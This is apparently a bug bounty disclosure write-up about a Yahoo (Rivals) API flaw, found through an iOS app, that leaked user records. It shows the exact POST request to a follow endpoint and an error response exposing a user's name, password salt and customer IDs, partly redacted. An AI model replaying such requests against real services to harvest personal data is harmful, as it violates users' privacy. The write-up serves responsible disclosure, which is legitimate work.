Story about more than 3.5 million PII leakage in Yahoo!!! (Using an IOS) Bug worth $9,500

POST /api/v1/user/3123911/follow HTTP/1.1
Accept: application/json
Content-Type: application/json
Accept-Encoding: gzip, deflate
Connection: close
If-None-Match: XXXXxxxXXXXX
Cookie: _rivalry_session_v2=XXXXXxxxxXXXXXX
Authorization: token XXXXXxxxxxXXXXXX
Content-Length: 33
Accept-Language: en-us{"follow":{"type":"Site","id":1}}
HTTP/1.1 422 Unprocessable Entity
Cache-Control: max-age=0
Content-Type: application/json; charset=utf-8
Date: Sun, 07 Nov 2021 15:55:44 GMT
Expires: Sun, 07 Nov 2021 15:55:44 GMT
Referrer-Policy: no-referrer-when-downgrade
Server: ATS
Set-Cookie: _rivalry_session_v2=XXXXXXXxxxxxXXXXXX
Status: 422 Unprocessable Entity
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
x-ittl: 0:15m
X-Permitted-Cross-Domain-Policies: none
X-Powered-By: Phusion Passenger(R)
x-pver: 2.85A
X-Request-Id: XXXXxxxxxXXXXX
X-Runtime: 0.015939
X-XSS-Protection: 1; mode=block
Age: 0
Connection: close
Expect-CT: max-age=31536000, report-uri=""
Content-Length: 1124{"message":"not allowed to follow? this #\u003cUser id: 3123XXX, email: \"\", username: \"VictimName\", terms_and_conditions_accepted_at: \"2021-04-08 23:06:11\", created_at: \"2021-04-08 23:06:11\", updated_at: \"2021-07-25 22:41:56\", braintree_customer_id: nil, role: \"user\", legacy_password_hash: nil, first_name: \"victim\", last_name: \"bicharaBabu\", phone_number: nil, legacy_guid: nil, legacy_id: nil, legacy_password_changedate: nil, comped_all_sites: false, rivals_emails: nil, third_party_emails: nil, banned: false, title: nil, affiliated_site_id: 25, incentive_mail_send_count: 0, email_opt_out_date: nil, comp_all_sites_until: nil, obi_instrument_id: \"9659xxxx\", salt: \"XXXXXXXXXxxxxxxXXXXX\", guce_tos_record: [], accepted_events: nil, is_analyst: nil, obi_customer_id: \"rivalscom-0a6285910d26XXXXxxxxXXX\", inappropriate_username: false, refer_friend_id: nil, inappropriate_user_photo: nil, user_login_token: nil, login_token_valid_until: nil, saved_from_cancellation: nil, compromised: nil, forecast_ban: nil, customer_support_admin_expiration_date: nil\u003e"}


Bug Reported: Nov 7th (4 months ago)


Guys, I am excited to announce that after 7 years, Yahoo has now opened up a process for public disclosure! Guys, this is the first writeup to get official permission from yahoo!! #loveYahoo

Some of the helpful Links:



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


Security Researcher | works @vairavtech | Bug Bounty Hunter From 🇳🇵| Your IOS application needs a security service? |